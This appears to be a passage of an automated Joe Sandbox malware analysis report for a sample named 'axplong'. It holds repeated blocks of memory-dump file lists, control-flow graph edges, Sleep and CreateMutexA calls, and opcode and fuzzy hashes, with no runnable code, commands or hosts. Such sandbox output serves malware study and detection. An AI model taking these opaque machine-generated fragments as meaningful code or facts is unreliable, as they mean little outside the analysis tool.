                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 8dbfd27ca2ecf8c4b38a93a5ba4a2194ece77db366dace1b0dc62e06fc80a8d4
                                                                                                                                                                                                        • Instruction ID: fbd484e72104ecc9ce9dca8896509d4dfdfcb86b774807ab2f740f482a866b13
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8dbfd27ca2ecf8c4b38a93a5ba4a2194ece77db366dace1b0dc62e06fc80a8d4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF316A31A10200CBFB189BBCDD887ADB7A39F86318F20826CE150DB7D5D7759981A792

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 164 63a47d-63a49d 168 63a4cb-63a4e7 164->168 169 63a49f-63a4ab 164->169 172 63a515-63a534 168->172 173 63a4e9-63a4f5 168->173 170 63a4c1-63a4c8 call 64d593 169->170 171 63a4ad-63a4bb 169->171 170->168 171->170 176 63a874-63a87e call 666b9a * 2 171->176 174 63a562-63a846 call 647f30 172->174 175 63a536-63a542 172->175 178 63a4f7-63a505 173->178 179 63a50b-63a512 call 64d593 173->179 180 63a544-63a552 175->180 181 63a558-63a55f call 64d593 175->181 195 63a883-63a8c4 Sleep CreateMutexA 176->195 196 63a87e call 666b9a 176->196 178->176 178->179 179->172 180->176 180->181 181->174 198 63a8d7-63a8d8 195->198 199 63a8c6-63a8c8 195->199 196->195 199->198 200 63a8ca-63a8d5 199->200 200->198
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: e2b6c36838b8dffba405907b2d53fd4383975a5123988078f1c71b02d4d31d70
                                                                                                                                                                                                        • Instruction ID: 599696ab42d3e7d5ff80c77ed542289aebef4e7f409d1385e0ec225e99469718
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e2b6c36838b8dffba405907b2d53fd4383975a5123988078f1c71b02d4d31d70
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1317D31B00100CBEB08DBBCDD8476DBB639F86318F20436DE1959B7D6D7759981A792

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 202 63a5b2-63a5d2 206 63a600-63a61c 202->206 207 63a5d4-63a5e0 202->207 210 63a64a-63a669 206->210 211 63a61e-63a62a 206->211 208 63a5e2-63a5f0 207->208 209 63a5f6-63a5fd call 64d593 207->209 208->209 212 63a879-63a87e call 666b9a 208->212 209->206 216 63a697-63a846 call 647f30 210->216 217 63a66b-63a677 210->217 214 63a640-63a647 call 64d593 211->214 215 63a62c-63a63a 211->215 230 63a883-63a8c4 Sleep CreateMutexA 212->230 231 63a87e call 666b9a 212->231 214->210 215->212 215->214 218 63a679-63a687 217->218 219 63a68d-63a694 call 64d593 217->219 218->212 218->219 219->216 234 63a8d7-63a8d8 230->234 235 63a8c6-63a8c8 230->235 231->230 235->234 236 63a8ca-63a8d5 235->236 236->234
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: 5643509cf2f1f67483e2ee9508559c48ec10b269f3823d5c0120946e3612630b
                                                                                                                                                                                                        • Instruction ID: 444843613f3f7325bc2e187cd09a8e69fd1187fc2e3300a4023695e0e227b084
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5643509cf2f1f67483e2ee9508559c48ec10b269f3823d5c0120946e3612630b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E317931B00200DBEB08DBBCDD857ADBB639F86318F24826CE0509B7D5C7359982A792

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 238 639a0c-639a18 239 639a1a-639a28 238->239 240 639a2e-639cc1 call 64d593 call 647870 call 635b20 call 638a60 call 648150 call 647870 call 635b20 call 638a60 call 648150 238->240 239->240 241 63a847 239->241 243 63a883-63a8c4 Sleep CreateMutexA 241->243 244 63a847 call 666b9a 241->244 250 63a8d7-63a8d8 243->250 251 63a8c6-63a8c8 243->251 244->243 251->250 253 63a8ca-63a8d5 251->253 253->250
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506265175.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506314681.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506489899.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506548392.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506595722.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506897719.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506931878.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269506972578.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507055442.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507112682.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507181115.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507251558.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507321043.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507365984.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507425064.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507485005.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507526368.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507568986.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507621393.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507662099.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507701418.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507744699.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507804884.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507847964.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507894474.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507933685.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269507973976.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508015947.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508075524.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508125838.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508174190.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508225525.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508275112.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508331311.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508404433.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508458182.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508516977.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508579985.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508631771.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508685195.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508879206.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269508969929.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509057073.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509143176.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509232334.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000006.00000002.269509332303.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_630000_axplong.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                        • String ID: $2i
                                                                                                                                                                                                        • API String ID: 1464230837-421247651
                                                                                                                                                                                                        • Opcode ID: a340aa4cc566f77cd363894b0fae9970e5857a8d54b170c93b4655a53cb4ef43
                                                                                                                                                                                                        • Instruction ID: b7ffbf96d49933ac0878ae12e2e7fc6f9ea660cee9a90a50058cf74bef0206cb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a340aa4cc566f77cd363894b0fae9970e5857a8d54b170c93b4655a53cb4ef43
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6721A631604200CBEB189B6CEC8476CB7A3EF82314F20432DE5448B7D4CB71998297A2

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 283 63a27f-63a28b 284 63a2a1-63a2ca call 64d593 283->284 285 63a28d-63a29b 283->285 291 63a2f8-63a846 call 647f30 284->291 292 63a2cc-63a2d8 284->292 285->284 286 63a86a 285->286 289 63a883-63a8c4 Sleep CreateMutexA 286->289 290 63a86a call 666b9a 286->290 299 63a8d7-63a8d8 289->299 300 63a8c6-63a8c8 289->300 290->289 293 63a2da-63a2e8 292->293 294 63a2ee-63a2f5 call 64d593 292->294 293->286 293->294 294->291 300->299 303 63a8ca-63a8d5 300->303 303->299
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • Sleep.KERNELBASE(00000064), ref: 0063A893
                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.269506314681.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true
